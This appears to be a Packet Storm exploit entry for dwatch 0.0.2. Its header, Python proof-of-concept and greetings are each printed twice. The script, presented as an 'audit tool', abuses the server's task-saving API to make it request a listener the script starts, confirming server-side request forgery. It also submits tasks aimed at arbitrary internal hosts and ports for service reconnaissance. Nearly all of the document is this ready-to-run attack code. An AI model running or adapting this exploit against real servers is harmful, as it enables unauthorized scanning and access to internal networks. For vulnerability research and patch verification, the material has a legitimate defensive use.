Description
This is an auditing tool to analyze server-side request forgery vulnerabilities in dwatch version 0.0.2...
Basic Information
ID
PACKETSTORM:222328
Published
Jun 1, 2026 at 00:00
Affected Product
Affected Versions
==================================================================================================================================
| # Title : dwatch 0.0.2 SSRF Boundary and Network Isolation Audit Tool |
| # Author : indoushka |
| # Tested on : Windows 11 Fr (Pro) / browser : Mozilla Firefox 147.0.4 (64-bit) |
| # Vendor : https://github.com/dhjz/dwatch/ |
==================================================================================================================================
[+] Summary : A security utility that tests network boundary enforcement and detects potential Server-Side Request Forgery (SSRF) behavior in systems resembling a hypothetical dwatch environment.
[+] POC :
#!/usr/bin/env python3
import re
import csv
import json
import time
import socket
import logging
import threading
import argparse
import urllib3
from pathlib import Path
from datetime import datetime
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse, urljoin
import requests
# Configure the root logger: INFO level and above, each record prefixed with a
# timestamp and its level name.
logging.basicConfig(level=logging.INFO, format='%(asctime)s - [%(levelname)s] - %(message)s')
# Named logger used by the classes and functions defined below.
logger = logging.getLogger("DWatchAuditor")
# Suppress urllib3's InsecureRequestWarning messages.
# NOTE(review): no request in the visible code passes verify=False, so this
# may be unnecessary - confirm before relying on it.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class DWatchAuditorCore:
    """Client for a dwatch server's task API plus a one-shot callback listener.

    The class submits scheduled tasks to ``<target>/api/task/save`` and can
    start a local TCP listener to observe whether the server makes the
    outbound request described by such a task.

    Attributes:
        base_url: Normalised ``scheme://netloc/path`` of the target, without a
            trailing slash.
        save_endpoint: URL that task definitions are POSTed to.
        callback_host / callback_port: Address placed in the callback URL; the
            listener binds ``0.0.0.0:callback_port``.
        created_tasks: One dict (``name``, ``url``, ``spec``) per task the
            server accepted.
        callback_event: Set when an inbound connection is accepted, and also
            used to tell the listener thread to stop.
        callback_data: One dict (``sender``, ``raw``) per accepted connection.
        lock: Guards ``callback_data``.
    """

    # Seconds the listener blocks in accept() before re-checking the stop flag.
    # Kept short so the port is released promptly once a run is over.
    ACCEPT_POLL_SECONDS = 0.2
    # Seconds to wait for an inbound connection after the task was accepted.
    CALLBACK_WAIT_SECONDS = 12
    # Seconds an accepted client may stay silent before it is dropped.
    CLIENT_IO_TIMEOUT_SECONDS = 5
    # Upper bound on how long to wait for the listener to finish binding.
    LISTENER_READY_SECONDS = 0.5
    LISTENER_THREAD_NAME = "dwatch-callback-listener"

    def __init__(self, target: str, callback_host: Optional[str] = None,
                 callback_port: int = 8888, verbose: bool = False):
        """Normalise the target URL and prepare the HTTP session.

        Args:
            target: Base URL of the server; ``http://`` is assumed when no
                scheme is given.
            callback_host: Host to put in the callback URL. When falsy it is
                detected on first use via ``_get_local_ip``.
            callback_port: Port for the callback URL and the local listener.
            verbose: Log every payload before it is submitted.

        Raises:
            ValueError: If ``target`` has no network location.
        """
        parsed = urlparse(target if "://" in target else f"http://{target}")
        if not parsed.netloc:
            raise ValueError(f"Invalid target URL structure: {target}")
        self.base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}".rstrip("/")
        self.callback_host = callback_host
        self.callback_port = callback_port
        self.verbose = verbose
        self.session = requests.Session()
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) BoundaryAuditor/1.0',
            'Content-Type': 'application/json'
        })
        self.save_endpoint = urljoin(self.base_url + "/", "api/task/save")
        self.created_tasks: List[Dict] = []
        self.callback_event = threading.Event()
        self.callback_data: List[Dict] = []
        self.lock = threading.Lock()

    def _get_local_ip(self) -> str:
        """Return the local address used for outbound traffic.

        Connecting a UDP socket only selects a route and local address; the
        address of that socket is returned. Falls back to ``127.0.0.1`` when
        the socket call fails.
        """
        try:
            with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
                s.connect(("8.8.8.8", 80))
                return s.getsockname()[0]
        except OSError:
            return "127.0.0.1"

    def create_audit_task(self, name: str, payload_url: str, spec: str = "*/5 * * * * *") -> bool:
        """POST a task definition to the server.

        Args:
            name: Task name.
            payload_url: URL the task should request.
            spec: Schedule expression sent as the ``spec`` field.

        Returns:
            True when the server answers HTTP 200 with a non-empty body (the
            task is then recorded in ``created_tasks``); False on any other
            status or on a transport error.
        """
        payload = {"name": name, "url": payload_url, "spec": spec}
        try:
            if self.verbose:
                logger.info("Submitting audit payload: %s -> %s", name, payload_url)
            response = self.session.post(self.save_endpoint, json=payload, timeout=10)
        except requests.RequestException as e:
            logger.error("Network transport error during task creation: %s", e)
            return False
        if response.status_code == 200 and response.text:
            logger.info("Audit task '%s' registered successfully.", name)
            self.created_tasks.append({'name': name, 'url': payload_url, 'spec': spec})
            return True
        logger.error("Failed to create task. HTTP Status: %s", response.status_code)
        return False

    def verify_boundary_leak(self) -> bool:
        """Submit a task pointing at a local listener and wait for a hit.

        Returns:
            True when an inbound connection reached the listener within
            ``CALLBACK_WAIT_SECONDS``; False when the task was rejected or no
            connection arrived.

        NOTE(review): any inbound TCP connection on the callback port counts
        as confirmation; the request path is not compared with the token.
        """
        if not self.callback_host:
            self.callback_host = self._get_local_ip()
        timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
        callback_url = f"http://{self.callback_host}:{self.callback_port}/ssrf_token_{timestamp}"
        logger.info("Callback URL: %s", callback_url)

        self.callback_event.clear()
        listener_ready = threading.Event()
        listener = threading.Thread(
            target=self._run_callback_socket,
            args=(listener_ready,),
            name=self.LISTENER_THREAD_NAME,
            daemon=True,
        )
        listener.start()
        # Wait until the listener has bound (or failed) instead of sleeping a
        # fixed interval; the upper bound matches the previous fixed delay.
        listener_ready.wait(timeout=self.LISTENER_READY_SECONDS)
        try:
            task_name = f"Boundary_Audit_{timestamp}"
            if not self.create_audit_task(task_name, callback_url, spec="* * * * * *"):
                return False
            logger.info("Waiting for inbound connection (timeout %ss)...",
                        self.CALLBACK_WAIT_SECONDS)
            if self.callback_event.wait(timeout=self.CALLBACK_WAIT_SECONDS):
                logger.critical("SSRF outbound boundary breach confirmed!")
                return True
            logger.warning("No inbound request captured.")
            return False
        finally:
            # Always stop the listener, including when the task was rejected;
            # otherwise its loop never ends and the port stays bound.
            self.callback_event.set()
            listener.join(timeout=self.ACCEPT_POLL_SECONDS + 1)

    def _run_callback_socket(self, ready: Optional[threading.Event] = None):
        """Listen on ``0.0.0.0:callback_port`` until ``callback_event`` is set.

        The first accepted connection sets ``callback_event``; its request
        bytes are recorded and answered with an empty HTTP 200.

        Args:
            ready: Optional event set once the socket is listening, or once
                setup has failed, so a waiting caller is never left blocked.
        """
        server_socket = None
        try:
            server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            server_socket.bind(("0.0.0.0", self.callback_port))
            server_socket.listen(1)
            # Short accept timeout so the stop flag is polled frequently.
            server_socket.settimeout(self.ACCEPT_POLL_SECONDS)
            if ready is not None:
                ready.set()
            while not self.callback_event.is_set():
                try:
                    client, addr = server_socket.accept()
                except socket.timeout:
                    continue
                self.callback_event.set()
                self._handle_callback_client(client, addr)
        except Exception as e:
            logger.error("Callback listener error: %s", e)
        finally:
            if ready is not None:
                ready.set()
            if server_socket is not None:
                server_socket.close()

    def _handle_callback_client(self, client, addr):
        """Record one inbound request, reply with an empty 200, then close."""
        try:
            # Accepted sockets do not inherit the listener's timeout; bound
            # the read so a silent client cannot block the thread forever.
            client.settimeout(self.CLIENT_IO_TIMEOUT_SECONDS)
            try:
                raw_request = client.recv(2048).decode("utf-8", errors="ignore")
            except socket.timeout:
                raw_request = ""
            with self.lock:
                self.callback_data.append({"sender": addr, "raw": raw_request})
            logger.info("Inbound connection from %s:%s", addr[0], addr[1])
            client.sendall(
                b"HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 0\r\n\r\n"
            )
        finally:
            client.close()

    def check_internal_service(self, host: str, port: int) -> Dict:
        """Submit a task that requests ``http://host:port/`` and report the result.

        Returns:
            A dict with ``port``, ``task_accepted`` (whether the server
            accepted the task) and a human-readable ``inference``. Acceptance
            only means the task was stored; it does not show that the request
            succeeded.
        """
        url = f"http://{host}:{port}/"
        task_name = f"service_recon_{port}_{int(time.time())}"
        success = self.create_audit_task(task_name, url, spec="*/5 * * * * *")
        return {
            "port": port,
            "task_accepted": success,
            "inference": (
                "Task submitted - requires log verification"
                if success else "Blocked or unreachable endpoint"
            )
        }
class InteractiveConsoleInterface:
    """Text menu that drives a ``DWatchAuditorCore`` from stdin/stdout.

    Menu options: run the callback test, submit a task for a host/port,
    submit an arbitrary task, list the tasks accepted so far, or exit.
    """

    MIN_PORT = 1
    MAX_PORT = 65535

    def __init__(self, auditor: "DWatchAuditorCore"):
        # Forward-reference annotation: the class is resolved lazily, so this
        # definition does not depend on declaration order.
        self.auditor = auditor

    @staticmethod
    def _parse_port(text: str) -> Optional[int]:
        """Return ``text`` as a TCP port in 1..65535, or None when invalid."""
        try:
            port = int(text.strip())
        except ValueError:
            return None
        if InteractiveConsoleInterface.MIN_PORT <= port <= InteractiveConsoleInterface.MAX_PORT:
            return port
        return None

    def display_menu(self):
        """Show the menu repeatedly until the user exits.

        End-of-input or Ctrl-C at any prompt leaves the menu cleanly instead
        of surfacing as an error.
        """
        while True:
            print("\n" + "=" * 50)
            print("dwatch SSRF Boundary Auditor")
            print("=" * 50)
            print("1. Run SSRF Test")
            print("2. Check Internal Port")
            print("3. Create Task")
            print("4. View Tasks")
            print("5. Exit")
            try:
                keep_going = self._handle_choice(input("> ").strip())
            except (EOFError, KeyboardInterrupt):
                print()
                break
            if not keep_going:
                break

    def _handle_choice(self, choice: str) -> bool:
        """Run one menu action; return False when the menu should close."""
        if choice == "1":
            self.auditor.verify_boundary_leak()
        elif choice == "2":
            host = input("Host: ").strip() or "127.0.0.1"
            port = self._parse_port(input("Port: "))
            if port is None:
                print("Invalid port")
                return True
            print(json.dumps(self.auditor.check_internal_service(host, port), indent=2))
        elif choice == "3":
            name = input("Task name: ").strip()
            url = input("URL: ").strip()
            self.auditor.create_audit_task(name, url)
        elif choice == "4":
            print(json.dumps(self.auditor.created_tasks, indent=2))
        elif choice == "5":
            return False
        else:
            print("Unknown option")
        return True
def parse_callback_address(value: str, default_port: int = 8888) -> Tuple[Optional[str], int]:
    """Split a ``HOST[:PORT]`` command-line value into host and port.

    Args:
        value: Text given to ``--callback``.
        default_port: Port used when ``value`` carries none.

    Returns:
        ``(host, port)``. ``host`` is None when only ``:PORT`` was given, so
        the caller can fall back to automatic host detection.

    Raises:
        ValueError: If the port part is not an integer in 1..65535.
    """
    host, sep, port_text = value.rpartition(":")
    # No colon, or a bracketed IPv6 literal without a port: host only.
    if not sep or value.endswith("]"):
        return value, default_port
    try:
        port = int(port_text)
    except ValueError:
        raise ValueError(f"Invalid callback port: {port_text!r}") from None
    if not 1 <= port <= 65535:
        raise ValueError(f"Callback port out of range (1-65535): {port}")
    return (host or None), port


def main():
    """Parse the command line and run the tool.

    Returns:
        0 when the selected mode ran to completion, 1 when it aborted with an
        unexpected error. An invalid ``--callback`` value ends the process
        through ``argparse`` with a usage message.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", required=True,
                        help="base URL of the server (http:// assumed when no scheme is given)")
    parser.add_argument("-c", "--callback",
                        help="HOST[:PORT] for the callback URL (default port 8888)")
    parser.add_argument("-i", "--interactive", action="store_true",
                        help="open the interactive menu instead of running one check")
    parser.add_argument("-v", "--verbose", action="store_true",
                        help="log each payload before it is submitted")
    args = parser.parse_args()

    callback_host = None
    callback_port = 8888
    if args.callback:
        try:
            callback_host, callback_port = parse_callback_address(args.callback)
        except ValueError as exc:
            # Report bad input as a usage error rather than a traceback.
            parser.error(str(exc))

    try:
        auditor = DWatchAuditorCore(
            target=args.target,
            callback_host=callback_host,
            callback_port=callback_port,
            verbose=args.verbose
        )
        if args.interactive:
            InteractiveConsoleInterface(auditor).display_menu()
        else:
            logger.info("Running SSRF boundary check...")
            auditor.verify_boundary_leak()
    except Exception as e:
        logger.critical(f"Fatal error: {e}")
        return 1
    return 0


if __name__ == "__main__":
    # Propagate main()'s status so callers can detect a failed run.
    raise SystemExit(main())
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
| # Title : dwatch 0.0.2 SSRF Boundary and Network Isolation Audit Tool |
| # Author : indoushka |
| # Tested on : Windows 11 Fr (Pro) / browser : Mozilla Firefox 147.0.4 (64-bit) |
| # Vendor : https://github.com/dhjz/dwatch/ |
==================================================================================================================================
[+] Summary : A security utility that tests network boundary enforcement and detects potential Server-Side Request Forgery (SSRF) behavior in systems resembling a hypothetical dwatch environment.
[+] POC :
#!/usr/bin/env python3
import re
import csv
import json
import time
import socket
import logging
import threading
import argparse
import urllib3
from pathlib import Path
from datetime import datetime
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse, urljoin
import requests
# Configure the root logger: INFO level and above, each record prefixed with a
# timestamp and its level name.
logging.basicConfig(level=logging.INFO, format='%(asctime)s - [%(levelname)s] - %(message)s')
# Named logger used by the classes and functions defined below.
logger = logging.getLogger("DWatchAuditor")
# Suppress urllib3's InsecureRequestWarning messages.
# NOTE(review): no request in the visible code passes verify=False, so this
# may be unnecessary - confirm before relying on it.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class DWatchAuditorCore:
    """Client for a dwatch server's task API plus a one-shot callback listener.

    The class submits scheduled tasks to ``<target>/api/task/save`` and can
    start a local TCP listener to observe whether the server makes the
    outbound request described by such a task.

    Attributes:
        base_url: Normalised ``scheme://netloc/path`` of the target, without a
            trailing slash.
        save_endpoint: URL that task definitions are POSTed to.
        callback_host / callback_port: Address placed in the callback URL; the
            listener binds ``0.0.0.0:callback_port``.
        created_tasks: One dict (``name``, ``url``, ``spec``) per task the
            server accepted.
        callback_event: Set when an inbound connection is accepted, and also
            used to tell the listener thread to stop.
        callback_data: One dict (``sender``, ``raw``) per accepted connection.
        lock: Guards ``callback_data``.
    """

    # Seconds the listener blocks in accept() before re-checking the stop flag.
    # Kept short so the port is released promptly once a run is over.
    ACCEPT_POLL_SECONDS = 0.2
    # Seconds to wait for an inbound connection after the task was accepted.
    CALLBACK_WAIT_SECONDS = 12
    # Seconds an accepted client may stay silent before it is dropped.
    CLIENT_IO_TIMEOUT_SECONDS = 5
    # Upper bound on how long to wait for the listener to finish binding.
    LISTENER_READY_SECONDS = 0.5
    LISTENER_THREAD_NAME = "dwatch-callback-listener"

    def __init__(self, target: str, callback_host: Optional[str] = None,
                 callback_port: int = 8888, verbose: bool = False):
        """Normalise the target URL and prepare the HTTP session.

        Args:
            target: Base URL of the server; ``http://`` is assumed when no
                scheme is given.
            callback_host: Host to put in the callback URL. When falsy it is
                detected on first use via ``_get_local_ip``.
            callback_port: Port for the callback URL and the local listener.
            verbose: Log every payload before it is submitted.

        Raises:
            ValueError: If ``target`` has no network location.
        """
        parsed = urlparse(target if "://" in target else f"http://{target}")
        if not parsed.netloc:
            raise ValueError(f"Invalid target URL structure: {target}")
        self.base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}".rstrip("/")
        self.callback_host = callback_host
        self.callback_port = callback_port
        self.verbose = verbose
        self.session = requests.Session()
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) BoundaryAuditor/1.0',
            'Content-Type': 'application/json'
        })
        self.save_endpoint = urljoin(self.base_url + "/", "api/task/save")
        self.created_tasks: List[Dict] = []
        self.callback_event = threading.Event()
        self.callback_data: List[Dict] = []
        self.lock = threading.Lock()

    def _get_local_ip(self) -> str:
        """Return the local address used for outbound traffic.

        Connecting a UDP socket only selects a route and local address; the
        address of that socket is returned. Falls back to ``127.0.0.1`` when
        the socket call fails.
        """
        try:
            with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
                s.connect(("8.8.8.8", 80))
                return s.getsockname()[0]
        except OSError:
            return "127.0.0.1"

    def create_audit_task(self, name: str, payload_url: str, spec: str = "*/5 * * * * *") -> bool:
        """POST a task definition to the server.

        Args:
            name: Task name.
            payload_url: URL the task should request.
            spec: Schedule expression sent as the ``spec`` field.

        Returns:
            True when the server answers HTTP 200 with a non-empty body (the
            task is then recorded in ``created_tasks``); False on any other
            status or on a transport error.
        """
        payload = {"name": name, "url": payload_url, "spec": spec}
        try:
            if self.verbose:
                logger.info("Submitting audit payload: %s -> %s", name, payload_url)
            response = self.session.post(self.save_endpoint, json=payload, timeout=10)
        except requests.RequestException as e:
            logger.error("Network transport error during task creation: %s", e)
            return False
        if response.status_code == 200 and response.text:
            logger.info("Audit task '%s' registered successfully.", name)
            self.created_tasks.append({'name': name, 'url': payload_url, 'spec': spec})
            return True
        logger.error("Failed to create task. HTTP Status: %s", response.status_code)
        return False

    def verify_boundary_leak(self) -> bool:
        """Submit a task pointing at a local listener and wait for a hit.

        Returns:
            True when an inbound connection reached the listener within
            ``CALLBACK_WAIT_SECONDS``; False when the task was rejected or no
            connection arrived.

        NOTE(review): any inbound TCP connection on the callback port counts
        as confirmation; the request path is not compared with the token.
        """
        if not self.callback_host:
            self.callback_host = self._get_local_ip()
        timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
        callback_url = f"http://{self.callback_host}:{self.callback_port}/ssrf_token_{timestamp}"
        logger.info("Callback URL: %s", callback_url)

        self.callback_event.clear()
        listener_ready = threading.Event()
        listener = threading.Thread(
            target=self._run_callback_socket,
            args=(listener_ready,),
            name=self.LISTENER_THREAD_NAME,
            daemon=True,
        )
        listener.start()
        # Wait until the listener has bound (or failed) instead of sleeping a
        # fixed interval; the upper bound matches the previous fixed delay.
        listener_ready.wait(timeout=self.LISTENER_READY_SECONDS)
        try:
            task_name = f"Boundary_Audit_{timestamp}"
            if not self.create_audit_task(task_name, callback_url, spec="* * * * * *"):
                return False
            logger.info("Waiting for inbound connection (timeout %ss)...",
                        self.CALLBACK_WAIT_SECONDS)
            if self.callback_event.wait(timeout=self.CALLBACK_WAIT_SECONDS):
                logger.critical("SSRF outbound boundary breach confirmed!")
                return True
            logger.warning("No inbound request captured.")
            return False
        finally:
            # Always stop the listener, including when the task was rejected;
            # otherwise its loop never ends and the port stays bound.
            self.callback_event.set()
            listener.join(timeout=self.ACCEPT_POLL_SECONDS + 1)

    def _run_callback_socket(self, ready: Optional[threading.Event] = None):
        """Listen on ``0.0.0.0:callback_port`` until ``callback_event`` is set.

        The first accepted connection sets ``callback_event``; its request
        bytes are recorded and answered with an empty HTTP 200.

        Args:
            ready: Optional event set once the socket is listening, or once
                setup has failed, so a waiting caller is never left blocked.
        """
        server_socket = None
        try:
            server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            server_socket.bind(("0.0.0.0", self.callback_port))
            server_socket.listen(1)
            # Short accept timeout so the stop flag is polled frequently.
            server_socket.settimeout(self.ACCEPT_POLL_SECONDS)
            if ready is not None:
                ready.set()
            while not self.callback_event.is_set():
                try:
                    client, addr = server_socket.accept()
                except socket.timeout:
                    continue
                self.callback_event.set()
                self._handle_callback_client(client, addr)
        except Exception as e:
            logger.error("Callback listener error: %s", e)
        finally:
            if ready is not None:
                ready.set()
            if server_socket is not None:
                server_socket.close()

    def _handle_callback_client(self, client, addr):
        """Record one inbound request, reply with an empty 200, then close."""
        try:
            # Accepted sockets do not inherit the listener's timeout; bound
            # the read so a silent client cannot block the thread forever.
            client.settimeout(self.CLIENT_IO_TIMEOUT_SECONDS)
            try:
                raw_request = client.recv(2048).decode("utf-8", errors="ignore")
            except socket.timeout:
                raw_request = ""
            with self.lock:
                self.callback_data.append({"sender": addr, "raw": raw_request})
            logger.info("Inbound connection from %s:%s", addr[0], addr[1])
            client.sendall(
                b"HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 0\r\n\r\n"
            )
        finally:
            client.close()

    def check_internal_service(self, host: str, port: int) -> Dict:
        """Submit a task that requests ``http://host:port/`` and report the result.

        Returns:
            A dict with ``port``, ``task_accepted`` (whether the server
            accepted the task) and a human-readable ``inference``. Acceptance
            only means the task was stored; it does not show that the request
            succeeded.
        """
        url = f"http://{host}:{port}/"
        task_name = f"service_recon_{port}_{int(time.time())}"
        success = self.create_audit_task(task_name, url, spec="*/5 * * * * *")
        return {
            "port": port,
            "task_accepted": success,
            "inference": (
                "Task submitted - requires log verification"
                if success else "Blocked or unreachable endpoint"
            )
        }
class InteractiveConsoleInterface:
    """Text menu that drives a ``DWatchAuditorCore`` from stdin/stdout.

    Menu options: run the callback test, submit a task for a host/port,
    submit an arbitrary task, list the tasks accepted so far, or exit.
    """

    MIN_PORT = 1
    MAX_PORT = 65535

    def __init__(self, auditor: "DWatchAuditorCore"):
        # Forward-reference annotation: the class is resolved lazily, so this
        # definition does not depend on declaration order.
        self.auditor = auditor

    @staticmethod
    def _parse_port(text: str) -> Optional[int]:
        """Return ``text`` as a TCP port in 1..65535, or None when invalid."""
        try:
            port = int(text.strip())
        except ValueError:
            return None
        if InteractiveConsoleInterface.MIN_PORT <= port <= InteractiveConsoleInterface.MAX_PORT:
            return port
        return None

    def display_menu(self):
        """Show the menu repeatedly until the user exits.

        End-of-input or Ctrl-C at any prompt leaves the menu cleanly instead
        of surfacing as an error.
        """
        while True:
            print("\n" + "=" * 50)
            print("dwatch SSRF Boundary Auditor")
            print("=" * 50)
            print("1. Run SSRF Test")
            print("2. Check Internal Port")
            print("3. Create Task")
            print("4. View Tasks")
            print("5. Exit")
            try:
                keep_going = self._handle_choice(input("> ").strip())
            except (EOFError, KeyboardInterrupt):
                print()
                break
            if not keep_going:
                break

    def _handle_choice(self, choice: str) -> bool:
        """Run one menu action; return False when the menu should close."""
        if choice == "1":
            self.auditor.verify_boundary_leak()
        elif choice == "2":
            host = input("Host: ").strip() or "127.0.0.1"
            port = self._parse_port(input("Port: "))
            if port is None:
                print("Invalid port")
                return True
            print(json.dumps(self.auditor.check_internal_service(host, port), indent=2))
        elif choice == "3":
            name = input("Task name: ").strip()
            url = input("URL: ").strip()
            self.auditor.create_audit_task(name, url)
        elif choice == "4":
            print(json.dumps(self.auditor.created_tasks, indent=2))
        elif choice == "5":
            return False
        else:
            print("Unknown option")
        return True
def parse_callback_address(value: str, default_port: int = 8888) -> Tuple[Optional[str], int]:
    """Split a ``HOST[:PORT]`` command-line value into host and port.

    Args:
        value: Text given to ``--callback``.
        default_port: Port used when ``value`` carries none.

    Returns:
        ``(host, port)``. ``host`` is None when only ``:PORT`` was given, so
        the caller can fall back to automatic host detection.

    Raises:
        ValueError: If the port part is not an integer in 1..65535.
    """
    host, sep, port_text = value.rpartition(":")
    # No colon, or a bracketed IPv6 literal without a port: host only.
    if not sep or value.endswith("]"):
        return value, default_port
    try:
        port = int(port_text)
    except ValueError:
        raise ValueError(f"Invalid callback port: {port_text!r}") from None
    if not 1 <= port <= 65535:
        raise ValueError(f"Callback port out of range (1-65535): {port}")
    return (host or None), port


def main():
    """Parse the command line and run the tool.

    Returns:
        0 when the selected mode ran to completion, 1 when it aborted with an
        unexpected error. An invalid ``--callback`` value ends the process
        through ``argparse`` with a usage message.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", required=True,
                        help="base URL of the server (http:// assumed when no scheme is given)")
    parser.add_argument("-c", "--callback",
                        help="HOST[:PORT] for the callback URL (default port 8888)")
    parser.add_argument("-i", "--interactive", action="store_true",
                        help="open the interactive menu instead of running one check")
    parser.add_argument("-v", "--verbose", action="store_true",
                        help="log each payload before it is submitted")
    args = parser.parse_args()

    callback_host = None
    callback_port = 8888
    if args.callback:
        try:
            callback_host, callback_port = parse_callback_address(args.callback)
        except ValueError as exc:
            # Report bad input as a usage error rather than a traceback.
            parser.error(str(exc))

    try:
        auditor = DWatchAuditorCore(
            target=args.target,
            callback_host=callback_host,
            callback_port=callback_port,
            verbose=args.verbose
        )
        if args.interactive:
            InteractiveConsoleInterface(auditor).display_menu()
        else:
            logger.info("Running SSRF boundary check...")
            auditor.verify_boundary_leak()
    except Exception as e:
        logger.critical(f"Fatal error: {e}")
        return 1
    return 0


if __name__ == "__main__":
    # Propagate main()'s status so callers can detect a failed run.
    raise SystemExit(main())
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================